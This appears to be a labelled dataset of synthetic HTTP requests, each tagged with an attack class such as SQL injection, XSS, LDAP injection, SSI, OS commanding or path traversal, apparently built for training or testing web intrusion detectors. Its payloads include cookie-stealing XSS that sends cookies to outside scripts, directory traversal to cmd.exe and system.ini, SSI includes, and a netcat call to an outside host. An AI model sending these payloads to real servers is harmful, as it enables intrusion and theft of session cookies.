Client-ip: 239.19.170.214
Cookie: oDIu=092979112
Cookie2: $Version="7"
Date: Wed, 23 May 07 03:11:52 UTC
ETag: "YVC3VkK4ypDbvG-NGs"
Expect: etree
From: k4wcg@aEdi7a2.de
If-Modified-Since: Wed, 23 Sep 09 06:35:21 GMT
If-Unmodified-Since: Sat, 17 Oct 09 15:42:24 UTC
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 14
MIME-Version: 2.2
Pragma: eeh='eInew'
Proxy-Authorization: NTLM c3B4Yml0cGFpaWk0YmVscWVpU2h0ZWRybGE3ZWluc3NlamlqbjZkb2Nq
Authorization: nHdi ga5e=ou2cdG
Range: 5591-,251722-40474
Referer: /ekzo/imd0r/fn3g.js
TE: trailers,deflate;q=0.6
Trailer: Authorization
User-Agent: Mozilla/0.0 (Windows; U; WinNT 3.1; ed-uS; rv:3.4.9) Gecko/42239772
UA-Disp: 7073,179,8
UA-OS: Win98
Via: eltSs/2.3 48.123.178.187, 4.0 148.252.199.132
Transfer-Encoding: deflate
Upgrade: oshili/5.5, wen/5.9
Warning: 693 www.esm2no.shtml:36 "eEi40rmtp" "Sun, 28 Feb 10 20:28:26 CET"
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 39592
Start - Id: 35188
class: SqlInjection
GET /k5PrwhereE9o/eP2eokirDbiaannka/tRbW1/olstz6tosmalw/kb2ec22hgimhom.msf?oyTsttgattfn8m=i%7Er52e%26%5B%3Fr%3A2&sHN=5d7unionui&Sslnsuk=OR+++++%27iculc%27+IN+++%28+%27+%27+%29&bow=tngai&GMrEiIvwinntyJ=mlmite%3CndatIb&ndroweFti=oxp_tf&passwdSo23L4VAmg2=080&Dsre1yuowbbhpi=qmkhpas&0uetcr5hea6qDen=5sy&HzZaBnph-deleteCLAe=sp&r56j=c1meta&hfumrtilyre=479918943&wt=ep%40oqVfaVmDU&hatc0eyrtoti9A5=tjS23vzdL5F&4OOku5=Ehlocxgls7nph-h HTTP/1.0
Host: 57.182.90.207:87
Connection: keep-alive
Accept: video/quicktime;q=0.4, image/png
Accept-Charset: ks_c_5601-1987, iso-10646-ucs-2;q=0.6
Accept-Encoding: 
Accept-Language: *
Cache-Control: max-stale=191
Client-ip: 116.56.251.175
Cookie: ssdptwo=rr7fruJeh;mmdneJoecc=9869692
Cookie2: $Version="711"
Date: Thu, 28 Feb 08 02:20:02 UTC
ETag: W/"MmDAZwouxSzTM9a"
Expect: twhn
From: sktrhbow@Tasrdtm7.st
If-Modified-Since: Fri, 03 Aug 07 15:25:10 UTC
If-Unmodified-Since: Fri, 21 May 04 18:51:43 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 749
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: ortr bdoanD=ot23oe
Authorization: Et9m nEu55lo=aeeeo
Range: -76801,392-,94069-
Referer: /eemT2a/da2iO.mp3
TE: deflate
Trailer: Referer
User-Agent: Mozilla/7.9 (Machintosh; U; Mac OS X 5.6; tn-ro; rv:5.2.3) Gecko/72147825
UA-CPU: StrongARM
UA-Disp: 1981,291,8
UA-Color: color32
UA-Pixels: 0990x1742
Via: eos/6.4 www.rtuHfees.js, 2.5 www.fdVslz.jpeg, FTP/8.4 154.58.43.245
Transfer-Encoding: ewyn
Warning: 913 12.114.230.71:1507 "rGsmdofPbfah2t8sgGp" "Tue, 13 Jul 04 12:14:20 GMT"
X-Forwarded-For: 74.88.12.154
----: -----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 35188
Start - Id: 47905
class: XSS
GET /a7FJv-MacelU3z26/o-zNh80/idt2wisonwz9se/5ncdneincazEUlnu/csdiehx86iahs/rPy3@pjUYq/nOp-6LJ.jpg?nqysdasha=%3Cimg+src++%3D%22+mocha%3A%5Bdocument.location.replace%28%27http%3A%2F%2Fwww.na.com%2Fcgi-bin%2Fnd.cgi%27%2Bdocument.cookie%29%3B%5D+++++%22+++%3E HTTP/1.0
Host: www.nar3sbCpae.be:80
Connection: oeh8
Accept: image/jpeg, image/jpeg;q=0.9
Accept-Charset: *;q=0.7
Accept-Encoding: gzip;q=0.5, deflate, compress, identity, identity;q=0.0
Accept-Language: 9m-etlOnsoh;q=0.7, oeg-m, chs7h-pRreOD
Cache-Control: ikw8eoE=Etm
Client-ip: 102.67.104.5
Cookie: oRcEaemmgoeeo=9501;MoluRpB=tuP5;o8neia9lpere=dtNals<tpoyamixtau;eDhtE=yr;2eueoHhoIhoetwe=595953;ks9rse1b=Pbgsounda>e echoto2tr
Cookie2: $Version="04"
Date: Tue, 26 Feb 08 15:14:03 GMT
ETag: "ifdVZPaP60cBTA8HNdjF"
Expect: nlrwmq
From: rigu@deao.net
If-Modified-Since: Sat, 21 Mar 09 13:22:19 UTC
If-Unmodified-Since: Tue, 04 May 10 22:23:07 GMT
If-Match: *
If-None-Match: "H9klOPmFb-OgsSNjL"
If-Range: Sun, 18 Apr 10 18:08:04 CET
Max-Forwards: 4913
MIME-Version: 3.3
Pragma: no-cache
Proxy-Authorization: NTLM c2lzZXVkcXNvT252d3NzNWlSbmVsc3NUcnZvZXVCNm90MnhlU250c1M1ZWVPZGV1
Authorization: Digest algorithm=MD5
Range: 0-,-42414
Referer: /lfc2/q6h3uh/ortet/orfs8.wav
TE: trailers
Trailer: Authorization
User-Agent: Mozilla/2.2 (X11; U; SunOS sun4u 6.5; er-os; rv:4.4.8) Gecko/35530253
UA-CPU: x86
UA-Disp: 213,2027,8
UA-OS: Mac OS X
UA-Color: color16
UA-Pixels: 229x467
Via: 6.8 106.134.189.19, 2.8 www.rhbc4.shtml, FTP/0.8 170.95.147.23
Transfer-Encoding: deflate
Upgrade: anee5/8.2, scSotq/7.5, 3th/0.1, krezts/1.0
Warning: 342 www.a3Idnne.js "aeea" "Tue, 23 Feb 10 05:56:33 UTC"
X-Forwarded-For: 90.98.250.32
X-Serial-Number: 8754080340538
----: -----------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47905
Start - Id: 37291
class: LdapInjection
POST /dBdHHNi-zze2L2uHM0/8AMX-ypI2h.l3wgkjX/corgalfoiood/geeoD646Oj/ip_nKwY6/oneNoopaHrh4sEemg/misd/gyyAvcDogEo/b2HQ1Rx/8dNorwl.htm? HTTP/1.1
Content-Length: 79
Content-Language: r
Content-Encoding: compress
Content-Location: /eqameedd/asic3l.php3
Content-MD5: aHJpZXNhOHRyYWVuZWZtMQ==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 30 Jul 06 08:49:29 UTC
Last-Modified: Wed, 19 Jan 05 07:53:09 CET
Host: 0.140.59.211:80
Connection: close
Accept: */*;q=0.1
Accept-Charset: koi8-r, iso-2022-kr;q=0.4, iso-8859-8, cp-936;q=0.5, iso-8859-7;q=0.8
Accept-Encoding: gzip;q=0.5, compress;q=0.9
Accept-Language: Phbaepia-t;q=0.6, c9qi0n-na2wsbR, esrot-p5on;q=0.5
Cache-Control: only-if-cached
Cookie: s3LfmyPOler=")(targetfilter=(o=NetscapeRoot));iu=3;vkkTyeio0ln=menetc1oe9st;dltETGlWJY=37;Pejo4unrronr=brfyb;st3
Cookie2: $Version="15"
Date: Fri, 21 Aug 09 09:13:28 UTC
ETag: "Ht5wuBfylZCo@.3Go"
Expect: Jdbnh0ro
If-Modified-Since: Fri, 04 Jan 08 03:56:59 UTC
If-Unmodified-Since: Thu, 22 Jul 04 10:23:50 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 913
MIME-Version: 2.3
Pragma: no-cache
Proxy-Authorization: euroth rnrIt=sutsw
Authorization: 1cec 8EindRv=49vRc7
Referer: /ifnoete/t3ea/iQyae7ix/eaxdaAJ0.mspx
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: 0Cfhusldemrc5f
UA-CPU: Sparc
UA-OS: Win98
Via: FTP/9.3 www.a0seoOt.js, y9wbt5/0.0 www.maedie.tiff, 5.7 200.17.56.78
Transfer-Encoding: deflate
Upgrade: S6L/0.2, c7n/2.1, pDi/4.6, ahie/3.0, gto/1.7
Warning: 504 www.ir4ljlee.js "3hjr" "Wed, 30 Jan 08 20:06:56 GMT"
----: ----------------------------------------------

BhtpassY6qPpR=cQOFiXUO@ph.&usnprhhhs=44&se=tu5Qy0QdM6&n9fR2oh=tcaPcyrjaudiRwE

End - Id: 37291
Start - Id: 40727
class: SSI
GET /aD/ts8u8psorlneeocgshe/sR/5ZG7PyIGR@NTEm_xbK./n5u7V2kK/wg2dOmcfgF6W/aiLnG6C.mMX/0RgEA77HgGI/his.png?jlitlli9c=rapi&eT2e=nAnesbr&tmp6XeKecho=51964&haemtXowet=7435&rihwteminuyDn5l=400368&9l=Ete+ HTTP/1.0
Host: www.enwe.it:488
Connection: keep-alive
Accept: video/*, audio/basic;q=0.9
Accept-Charset: *;q=0.5
Accept-Encoding: 
Accept-Language: *
Cache-Control: rihthE='omrq'
Client-ip: 70.143.133.112
Cookie: h0=9;@.NFhEN2=5;g.3YZGClike=rmej(httpbn;nunswtz=attruneemu
Cookie2: $Version="903"
Date: Fri, 06 Nov 09 21:38:41 GMT
Expect: ae7na=u0tnylko
If-Unmodified-Since: Wed, 20 May 09 09:42:29 UTC
If-Match: "hB6Mw4h0Qs64u4x"
If-None-Match: "YECnD@6UzElLITznf"
If-Range: "cbHi62gVGQk4Hcx"
Max-Forwards: 4874
Pragma: no-cache
Proxy-Authorization: tjnX ehot4z=nnOanNa
Authorization: wmtn eTp9=fewrru
Referer: /ckshe/htttobe/5erGw9.nsf
Trailer: Expect
User-Agent: <!--  #odbc    statement   ="select   hros,   kehuctat,    atn from  sAsaajnd  order     by  2,     08,  3"    -->
UA-CPU: x86
UA-Color: color8
UA-Pixels: 717x0244
Via: 9.9 www.sct6B9ir.png, 7.6 177.6.36.252, FTP/6.7 175.216.121.36
Transfer-Encoding: compress
Upgrade: tnhbcr/4.1, jltoS/5.7, hnntni/0.8, kjr8nt/5.2
Warning: 850 www.etd9dho.gif "oO8csieqpnsrcset1" "Fri, 25 Jan 08 04:08:10 GMT"
X-Serial-Number: 334821
----: ----------

null

End - Id: 40727
Start - Id: 40575
class: SSI
GET /8lqQkACJGH-/4ftav/boe/aottieJ/ht2nhmlainfa.js?eilsawqr7S3=8u6Eoiyfenr4s&rulnqLubw=%3C%21--++%23include++++virtual%3D%22d%3A%5Cwindows%5Cautoexec.bat%22+++--%3E&nDPoTKtmp=h&Z5-tiq5Ilw=nINL2W&elmadrf7tjeH=e091 HTTP/1.1
Host: www.Te9fsonI.org
Connection: close
Accept: */*
Accept-Charset: *
Accept-Encoding: compress;q=0.8, deflate
Accept-Language: tfus-0, eakhrszl-T
Cache-Control: fjy6vbjh='b'
Client-ip: 172.74.200.100
Cookie: rvilFil=fOax6Rh1onteadhd5T;os=triataXtfnmlugoa|molog;tRE=p7doCw7yhssxdsnysc;usinlsm9qb=e7e71|dtw4;
Cookie2: $Version="656"
Date: Wed, 22 Mar 06 08:34:00 GMT
ETag: "FnQikxnnlglOXVUA1"
Expect: nnoh3ur=unoiiuae
From: ciHn@mdreeh.gov
If-Modified-Since: Sat, 29 Dec 07 05:21:54 CET
If-Unmodified-Since: Wed, 18 Feb 09 24:19:53 UTC
If-Match: "_IO18LmBvhx7kAnb4"
If-None-Match: "4wn-EMelbxWFiaeNz2_"
If-Range: *
Max-Forwards: 1818
MIME-Version: 3.5
Pragma: ueo='Teo'
Proxy-Authorization: Digest nc=fd1FECD3
Authorization: Basic Zm9vZGVhYTpzY29v
Range: -296381
Referer: /takts.gif
TE: deflate;q=0.9,trailers
Trailer: Host
User-Agent: Mozilla/6.1 (Windows; U; Win 9x 3.9; R7-9u; rv:8.9.4) Gecko/45472037
UA-CPU: PowerPC
UA-Disp: 563,477,16
UA-OS: WinNT
UA-Pixels: 0455x286
Via: FTP/6.4 193.1.211.237:356
Transfer-Encoding: identity
Upgrade: nmoNa/7.1, shl/2.8, suah/2.9, drnip/9.7, aunle/8.8
Warning: 519 www.eejaeye.png "rslbjmqpxcnge" 
X-Forwarded-For: 26.88.83.25
X-Serial-Number: 56779
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40575
Start - Id: 43308
class: OsCommanding
GET /BA_y@5k@cCpdgMS.aspx?N4Qa7L3_Z=alorhp&emiaue=0ghn&sxteoa96o=8ev3%3AsocE+pa&KToeteoadcxee=liken-Tscript+anIt%7Eyea&hho=%3C4yim%3E&eaarmtoebas=t&adB5i=48159664&OAvexecid8IbOgxlike=noee&WGOsJA-=%250a+++nc+++++www.tanierchor.com+80+%3B&ixtoe7suaqM5=nad%27w HTTP/1.1
Host: 72.81.223.221:80
Connection: keep-alive
Accept: */*
Accept-Charset: x-mac-greek, iso-8859-8-i, iso-8859-4;q=0.6
Accept-Encoding: 
Accept-Language: sesnayt-twttnsg
Cache-Control: no-transform
Client-ip: 30.158.67.212
Cookie: rhirln01ermtu=tBz2U9g@4
Cookie2: $Version="21"
Date: Thu, 24 Jun 04 12:38:02 CET
ETag: W/"AZmcAcRfLdJ7fmTYUY"
Expect: eclgy=sefh
From: ehhmnsme@ohym.uk
If-Modified-Since: Thu, 25 Jan 07 20:34:29 UTC
If-Unmodified-Since: Tue, 03 Jan 06 01:52:59 UTC
If-Match: "bo.nYMc.KHOEAqWVu"
If-None-Match: "JFWi6FNoqeZXJvge0W"
If-Range: Mon, 19 Sep 05 05:23:10 UTC
Max-Forwards: 567
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic bG5zcDp0b2lia3Nhbw==
Authorization: Basic Ump1QW10RTprZnl6bnc=
Range: 398265-
Referer: /llThwyd.tar.gz
TE: trailers,chunked;q=0.3
Trailer: Cache-Control
User-Agent: Mozilla/6.1 (X11; U; Solaris 0.1; yz-9t; rv:9.1.6) Gecko/70793631
UA-CPU: StrongARM
UA-Disp: 260,218,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 3321x719
Via: ewt/6.6 www.Risghrds.htm
Transfer-Encoding: deflate
Upgrade: svhC/6.6, eeeovf/0.6, Rs9jj/2.4, inuc/6.8
Warning: 597 167.142.104.140 "ureioenlrkas6ps" 
X-Forwarded-For: 31.255.144.84
X-Serial-Number: 33268910997830583
----: ---------------
~~~~~: ~~~~~~~~~~

null

End - Id: 43308
Start - Id: 47618
class: XSS
GET /6bvsrtapinre3wedae.swf?kI=hB.Yh_M9lwlu&istem=%3C%3Cscript+%3E%5Bdocument.location.replace++++%28%27http%3A%2F%2Fwww.il.com%2Fcgi-bin%2Fstolin.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript++%3E&laih8atluidosaL=m%2Fpositionlcf%24nyb&eHds=1496993&4b4I7D=mcil&e91wie8nalxcr=ezn&gc=oxW94D1Iv&nmeEe2est6u0Ti=1q%3Eorn%291eHmcatxmlTa%3Fyfn HTTP/1.1
Host: www.rahJuclt.org:80
Connection: close
Accept: application/*;q=0.5, application/zip;q=0.7, audio/*
Accept-Charset: *;q=0.5
Accept-Encoding: deflate, deflate
Accept-Language: *
Cache-Control: l=2oeow
Client-ip: 254.77.17.52
Cookie: ahnbOaTOtFvua=taasq
Cookie2: $Version="5"
Date: Wed, 21 Oct 09 04:39:34 UTC
ETag: W/"UtO@wp6ZQnYA6s5"
Expect: 100-continue
From: drEnA@edtwavoDoa.com
If-Modified-Since: Mon, 24 Nov 08 17:55:18 UTC
If-Unmodified-Since: Wed, 04 May 05 10:55:11 CET
If-Match: "0RSXYfsh1Zj@J5Hh_"
If-None-Match: "ofCqQFy3emovqw4R"
If-Range: Fri, 02 Apr 10 07:39:45 UTC
Max-Forwards: 938
MIME-Version: 9.4
Pragma: es=xaso1al
Proxy-Authorization: 0yeere 7neifuPe=Hsrbcstt
Authorization: Digest qop=auth
Range: 393273-
Referer: /ctsoe/goo6y6sa/spdao/eantjoti/pallsty.doc
TE: deflate;q=0.3,gzip;q=0.3,chunked;q=0.6
Trailer: Expect
User-Agent: Mozilla/2.1 (Machintosh; U; PPC Mac OS X 6.2; 6n-nv; rv:6.9.7) Gecko/18225340
UA-CPU: StrongARM
UA-Disp: 722,561,16
UA-OS: Solaris
UA-Color: color16
UA-Pixels: 608x141
Via: FTP/3.4 53.23.221.198
Transfer-Encoding: identity
Upgrade: o54f/1.0, eete/2.9, tgnu/1.6
Warning: 114 www.elevwen.jpg "oserePt" 
X-Forwarded-For: 19.35.93.68
X-Serial-Number: 2524902769036083814
----: --------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47618
Start - Id: 44415
class: OsCommanding
GET %u002e%u002e%u002f%u002e%u002e%u002fwinnt/system32/cmd.exe?/c+dir HTTP/1.1
Host: www.Stpi.be
Connection: close
Accept: */*;q=0.2
Accept-Charset: *
Accept-Encoding: *
Accept-Language: h-gl;q=0.6, tebm-j;q=0.8, m-ceiML, ymoel-Eneyr;q=0.7
Cache-Control: y=tfvicem
Client-ip: 211.226.85.152
Cookie: asj9rot=40;b6yzQ=790589;whm=5z;egtc=nsmm
Cookie2: $Version="45"
Date: Fri, 17 Oct 08 03:46:03 CET
ETag: W/"V.NIwSOWHFxujXg-iF_9"
Expect: qeSl8a=erci;preie
From: on76@weg6se.uk
If-Modified-Since: Mon, 05 Jun 06 02:15:41 UTC
If-Unmodified-Since: Sat, 27 May 06 04:28:22 CET
If-Match: "2uzo5FNbXbBlmlGRD"
If-None-Match: "Ox7366H@R4rKw0BBBa7"
If-Range: Sat, 26 Mar 05 19:05:28 UTC
Max-Forwards: 07
MIME-Version: 6.2
Pragma: esGSwi=iteHEWe
Proxy-Authorization: NTLM NmU3cGFleWw5QWhnbmUxYWN0cGFzRVlocnpuZHVuZW5FaWx0VWs=
Authorization: Basic dHNldjo1YW1tb24=
Range: 6-02287,72753-
Referer: http://www.eceon.de/ttaos/eOkutro/eje61lo.exe
TE: deflate,gzip;q=0.6
Trailer: Warning
User-Agent: Mozilla/6.8 (Machintosh; U; PPC 2.6; ci-uc; rv:7.2.8) Gecko/59098248
UA-CPU: Sparc
UA-Disp: 321,8339,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 6396x837
Via: r0as/4.4 200.35.86.134
Transfer-Encoding: deflate
Upgrade: asneah/1.8, akhg/1.6
Warning: 979 78.14.185.203:6018 "tTaatehewrtmsw1blocn" "Fri, 25 Jan 08 13:54:58 GMT"
X-Forwarded-For: 80.244.159.109
X-Serial-Number: 16197588346334119700
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44415
Start - Id: 45883
class: PathTransversal
GET /xb6FCwphp/tKb1UMoQJs/lR@UJ0teNrP/ilhzirm6dl4hnen1etsy.tiff?KyHkfFlopw=tFN_1GKkT&Orhsf=a5EihnraNlim8e7Cn&jtco=ToojNh20e&eeeet9eblo9i=..%5C..%5C..%5C..%5C..%5C..%5CWINDOWS%5Csystem.ini HTTP/1.1
Host: www.gxsfx.gov
Connection: close
Accept: image/png, application/*, image/*
Accept-Charset: *;q=0.2
Accept-Encoding: *
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 58.223.222.209
Cookie: h9emureouw=086193161;M4LformvJ=dhqTcs;VGncdlyNsock_streamG=eOkseaqi3o
Cookie2: $Version="49"
Date: Thu, 16 Oct 08 24:11:24 GMT
ETag: "qcIN6.ToaSAjnoWr"
Expect: 100-continue
From: erymey@jq6fn.org
If-Modified-Since: Wed, 30 Jan 08 10:42:31 GMT
If-Unmodified-Since: Thu, 01 Nov 07 13:43:47 CET
If-Match: "6ZoJKPLkFBZhBOd"
If-None-Match: "BTyz_6tsDEPm5Zt"
If-Range: Sun, 04 Jun 06 01:21:45 GMT
Max-Forwards: 2
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM bXJzYXBhbGFnZ25vNnQ2YXJhc050bnNoZUttZktzcm0=
Authorization: NTLM b0VYaXJIbndSVHhlaXlhZXN1OGVpZXJwZWFueE9laWFudHNicDJoc2VlZHY=
Range: 81947-,357703-
Referer: http://ifoee.biz/hOvhtoo/ndui/6t8tfT0/wce9o.swf
TE: deflate;q=0.0,deflate;q=0.1
Trailer: TE
User-Agent: rbtdtetin1qtfaz9hsm
UA-CPU: StrongARM
UA-Disp: 567,3273,32
UA-OS: Solaris
UA-Color: color32
UA-Pixels: 0549x672
Via: ooieti/9.3 88.252.154.57
Transfer-Encoding: pqirj
Upgrade: hefsr/6.5, dHr/8.0, ntceiI/7.2, aesn/7.0
Warning: 742 165.170.93.206 "swnoxaS" 
X-Forwarded-For: 39.173.242.210
X-Serial-Number: 42462997439342204016
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45883
Start - Id: 44202
class: OsCommanding
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0
Host: www.Tegr4.org:80
Connection: 5D5st1r
Accept: */*;q=0.4
Accept-Charset: windows-874;q=0.7, iso-8859-8-i, windows-1257, windows-1255;q=0.4
Accept-Encoding: 
Accept-Language: rnl-Tlspe, cm48I-r;q=0.0
Cache-Control: no-transform
Client-ip: 56.183.96.43
Cookie: iWchlddpne7sn=mvod8vnwee;r@eVYwinnt%uiE=52358
Cookie2: $Version="370"
Date: Mon, 10 Jan 05 15:19:34 GMT
ETag: "wFfcy3k9UPL1p_h.3m"
Expect: yoeh
From: rOaz@gEadsxsee.biz
If-Modified-Since: Mon, 24 Jul 06 13:35:12 CET
If-Unmodified-Since: Sat, 04 Mar 06 13:12:06 UTC
If-Match: *
If-None-Match: *
If-Range: Sat, 03 Dec 05 17:12:26 GMT
Max-Forwards: 8
MIME-Version: 1.5
Pragma: n='kusw'
Proxy-Authorization: Basic d2x0ZTJlcmM6bnNsbWk=
Authorization: deDe noqS=nc7seio
Range: 22399-
Referer: /bmPaAmar.wmn
TE: chunked,trailers
Trailer: Referer
User-Agent: helzhi
UA-CPU: PowerPC
UA-Disp: 0876,3818,16
UA-OS: Win98
UA-Color: color32
UA-Pixels: 953x6132
Via: FTP/3.3 34.131.158.29:9022
Transfer-Encoding: identity
Upgrade: mrn/4.8, niDaor/3.7, h2u/1.0
Warning: 500 167.56.88.243 "a4steEosrC3cbant" "Thu, 15 Jul 04 08:17:33 UTC"
X-Forwarded-For: 81.148.120.241
X-Serial-Number: 77570647240448229537
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44202
Start - Id: 46818
class: XSS
POST /es9_5XxZ98e8UG1yZYWe/8oF3o3oP4/wvioeechNN/iH1LX/ir/e6dL6A_AaKdvqTtcrIug/irl4lcsaifoixtdBp/z3smZGT/.usrgI8TKW4SK/yfONuJ/sz9rnarqhoet.msf? HTTP/1.1
Content-Length: 286
Content-Language: tSdd,ebsti,oenOeeEs
Content-Encoding: identity
Content-Location: /elenEtl/chE4zed/tvansT/5ydetfe.swf
Content-MD5: YjJpeHBsYmxkaWhjQXRvcw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 12 Nov 09 16:34:18 CET
Last-Modified: Sun, 31 Jul 05 12:28:43 UTC
Host: www.16aei7huxn.be
Connection: keep-alive
Accept: */*
Accept-Charset: windows-1253, iso-8859-1, euc-tw;q=0.2, iso-2022-jp;q=0.8, x-mac-roman;q=0.3
Accept-Encoding: gzip;q=0.9
Accept-Language: *;q=0.2
Cache-Control: max-stale=05
Client-ip: 24.39.240.157
Cookie: veNrduoigi2yiKa=dnvEJ2sxneooH;irr8ejw=08
Cookie2: $Version="70"
Date: Wed, 14 Nov 07 08:37:40 GMT
ETag: W/"clqO4HlZF-77um5s4W"
Expect: taanns
From: wdvoio@iotd9eelwd.de
If-Modified-Since: Sat, 29 Sep 07 19:10:27 UTC
If-Unmodified-Since: Wed, 08 Jun 05 02:54:00 GMT
If-Match: "UX8X8CcOtW5iCLhIO2"
If-None-Match: *
If-Range: *
Max-Forwards: 5637
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: Digest cnonce="dGncrnt"
Authorization: NTLM ZVVyZTYwaWZzM2VlaW9ycm1IZm5zZW90bTRDaHMyaDd1
Range: 175390-78,55-,908690-
Referer: /HiUie/deadG/ben1e/wouQh.tiff
TE: trailers,gzip;q=0.3,trailers
Trailer: If-None-Match
User-Agent: Tefcebsd
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 818x5674
Via: Rxqa3/5.6 www.1aoe.png, 2.3 85.210.165.210, exqitq/8.5 www.vndr3arh.tiff
Transfer-Encoding: identity
Upgrade: haroE/4.5, c7ae2/5.1
Warning: 793 241.179.195.131 "halAIevnm" "Wed, 27 Apr 05 17:07:05 CET"
X-Forwarded-For: 90.185.191.90
X-Serial-Number: 80684101
----: --------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tirjs5mpipebc=stAs6P&dO8e=3erng0&t2tptd=nOl&acmsCetnots=aQo92LY&iusenpea=354179804&ejehO7hism2=sdgA-&T9r=Se&wo9cllcvstpRphe=3jtOeeiato2eWe7geN&epoq=124418097&Yh7k0Vsock_streamt=t7N2EcB4NP&xurl=<div  onmouseover   =    " [alert   ('u0sd');]     " >&f7fli1ei=83571

End - Id: 46818
Start - Id: 44491
class: OsCommanding
GET ..�../..�../mssql7/install/pubtext.bat" & dir c: .exe? HTTP/1.1
Host: 209.26.158.110
Connection: enau
Accept: audio/*;q=0.2, text/*
Accept-Charset: *
Accept-Encoding: *;q=0.2
Accept-Language: u-u;q=0.6, 8pubsm-thpmaot, lilv-edGyrs
Cache-Control: no-store
Client-ip: 224.120.218.101
Cookie: u0goav=bq_-b1-Xc-
Cookie2: $Version="7"
Date: Tue, 03 Feb 04 15:34:11 GMT
ETag: W/"eRpmRkmZ96ktFwtKx"
Expect: 100-continue
From: cI4oaebh@nrntt4iEtl.fr
If-Modified-Since: Sat, 17 Sep 05 02:12:35 CET
If-Unmodified-Since: Sun, 06 Mar 05 21:44:55 GMT
If-Match: *
If-None-Match: "RbkSl0Jm1l8T__J@gZ"
If-Range: "v-lub7Me1IPbwi8kUN"
Max-Forwards: 998
MIME-Version: 9.7
Pragma: i=eftw
Proxy-Authorization: Digest cnonce="suean1t"
Authorization: stacy7 2feono=dnha
Range: -80,3-,-9028
Referer: /tnoid/2pthe/mok2fwl/xvm8.pl
TE: gzip,trailers
Trailer: Via
User-Agent: Mozilla/1.0 (X11; U; Open BSD i386 9.6; es-is; rv:6.4.7) Gecko/81802137
UA-CPU: Sparc
UA-Disp: 3780,9274,8
UA-OS: Mac OS X
UA-Color: color8
UA-Pixels: 949x9593
Via: o4u/8.8 www.sriy.css:42353, ennsme/1.0 www.Z4csn.tiff
Transfer-Encoding: compress
Upgrade: tNaw/6.0, n1eien/5.5, iol/1.2, Rlt5/6.0
Warning: 079 172.67.80.251:54 "7stpts" 
X-Forwarded-For: 106.107.95.22
X-Serial-Number: 75943929627
----: ---------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44491
Start - Id: 40814
class: SSI
GET /oo7lzymA/9v5P5xO.shtml?rNsssVwyluietu=228140&ekxatfrii4=%3C%21--++%23odbc+connect%3D%22RiefdNZ%2Ctec%2Cnax%22++statement%3D%22select++++*+from+oo6e%22--%3E&6anieClrsui6=r6tteif4aese%7Ele&Z@VBrC=e%40MqgXd.&oOnlcvdle7amwx=r1 HTTP/1.1
Host: www.eeo2ne.biz
Connection: keep-alive
Accept: */*;q=0.3
Accept-Charset: x-mac-roman, koi8-r
Accept-Encoding: identity;q=0.6, compress, gzip
Accept-Language: a34frcte-0hesrfi
Cache-Control: only-if-cached
Client-ip: 89.161.138.91
Cookie: bxsE0qowo4q=lbdmheooaoe;novn=596;9uphrtcngtaaka=oLajeeowereplaceb0
Cookie2: $Version="84"
Date: Tue, 17 Feb 04 02:06:29 UTC
ETag: "V0yqNhaPfiAfr9wMm2IH"
Expect: zy1Nra
From: iiljwdi@httr81j.de
If-Modified-Since: Tue, 10 Feb 04 18:25:50 CET
If-Unmodified-Since: Sun, 25 Feb 07 24:47:14 CET
If-Match: *
If-None-Match: *
If-Range: "Jz@uU_i@G5wY0Wp"
Max-Forwards: 82
MIME-Version: 3.0
Pragma: son='empe1i'
Proxy-Authorization: on4ahi jgjs0nph=any1zdr
Authorization: Digest nonce
Range: 8-,53016-,755940-70410
Referer: http://www.oEzs.st/i8fe/ethamens.jpg
TE: gzip,trailers,chunked;q=0.6
Trailer: Range
User-Agent: Mozilla/4.7 (Machintosh; U; PPC Mac OS X 8.8; ht-dd; rv:3.7.6) Gecko/13380866
UA-CPU: StrongARM
UA-Disp: 327,318,8
UA-OS: Win98
UA-Color: color8
UA-Pixels: 871x928
Via: 7.5 199.120.32.143, HTTP/0.5 175.137.210.241, cero/6.3 www.bneA0u.htm
Transfer-Encoding: eneaao; tdqip=erSa
Upgrade: osd5g/7.7, cplms/1.4, dtwnv0/2.5, h9zg/0.0
Warning: 540 www.po8V.png "hmamwrzrbsooT4ssuu1y" "Sun, 05 Dec 04 12:09:33 CET"
X-Serial-Number: 17196143235816087076
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 40814
Start - Id: 43763
class: OsCommanding
